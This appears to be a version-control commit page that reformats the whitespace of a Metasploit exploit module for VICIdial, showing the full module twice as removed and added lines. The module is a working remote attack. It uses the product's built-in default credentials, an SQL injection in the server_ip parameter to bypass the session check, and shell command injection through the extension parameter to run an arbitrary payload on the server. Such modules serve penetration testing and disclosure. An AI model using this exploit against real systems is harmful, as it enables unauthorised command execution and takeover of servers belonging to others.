Ran resplat.rb and retab.rb. Fixed msftidy issues.

bug/bundler_fix
AverageSecurityGuy 2013-10-23 20:59:27 -04:00
parent 655e09f007
commit ecbbd7bb4b
1 changed files with 95 additions and 95 deletions


@ -6,109 +6,109 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial Manager Send OS Command Injection',
'Description' => %q{
The file agc/manager_send.php in the VICIdial web application uses
unsanitized user input as part of a command that is executed using the PHP
passthru() function. A valid username, password and session are needed to access
the injection point. Fortunately, VICIdial has two built-in accounts with default
passwords and the manager_send.php file has a SQL injection vulnerability that can
be used to bypass the session check as long as at least one session has been
created at some point in time. The results of the injected command are returned
as part of the response from the web server. Affected versions include 2.7RC1,
2.7, and 2.8-403a. Other versions are likely affected as well. The default
credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
},
'Author' =>
[
'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
'AverageSecurityGuy <stephen@averagesecurityguy.info>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
],
'DisclosureDate' => 'Oct 23 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial Manager Send OS Command Injection',
'Description' => %q{
The file agc/manager_send.php in the VICIdial web application uses
unsanitized user input as part of a command that is executed using the PHP
passthru() function. A valid username, password and session are needed to access
the injection point. Fortunately, VICIdial has two built-in accounts with default
passwords and the manager_send.php file has a SQL injection vulnerability that can
be used to bypass the session check as long as at least one session has been
created at some point in time. The results of the injected command are returned
as part of the response from the web server. Affected versions include 2.7RC1,
2.7, and 2.8-403a. Other versions are likely affected as well. The default
credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
},
'Author' =>
[
'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
'AverageSecurityGuy <stephen@averagesecurityguy.info>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
],
'DisclosureDate' => 'Oct 23 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
], self.class)
end
register_options(
[
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
], self.class)
end
def request(cmd)
begin
res = send_request_cgi({
'uri' => '/agc/manager_send.php',
'method' => 'GET',
'vars_get' => {
"enable_sipsak_messages" => "1",
"allow_sipsak_messages" => "1",
"protocol" => "sip",
"ACTION" => "OriginateVDRelogin",
"session_name" => rand_text_alpha(12), # Random session name
"server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
"extension" => ";#{cmd};",
"user" => datastore['USERNAME'],
"pass" => datastore['PASSWORD']
}
})
def request(cmd)
begin
res = send_request_cgi({
'uri' => '/agc/manager_send.php',
'method' => 'GET',
'vars_get' => {
"enable_sipsak_messages" => "1",
"allow_sipsak_messages" => "1",
"protocol" => "sip",
"ACTION" => "OriginateVDRelogin",
"session_name" => rand_text_alpha(12), # Random session name
"server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
"extension" => ";#{cmd};",
"user" => datastore['USERNAME'],
"pass" => datastore['PASSWORD']
}
})
if res.nil? or res.code == 404
vprint_error("#{rhost}:#{rport} - No response or page not found.")
return nil
end
if res.nil? or res.code == 404
vprint_error("#{rhost}:#{rport} - No response or page not found.")
return nil
end
if res.body =~ /Invalid Username\/Password/
vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
return nil
end
if res.body =~ /Invalid Username\/Password/
vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
return nil
end
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
def check
resp = request('ls -a .')
vprint_line(resp.body)
if resp.body =~ /\.\n\.\.\n/m
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
end
def check
resp = request('ls -a .')
def exploit
request("#{payload.encode}")
end
vprint_line(resp.body)
if resp.body =~ /\.\n\.\.\n/m
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
end
def exploit
request("#{payload.encode}")
end
end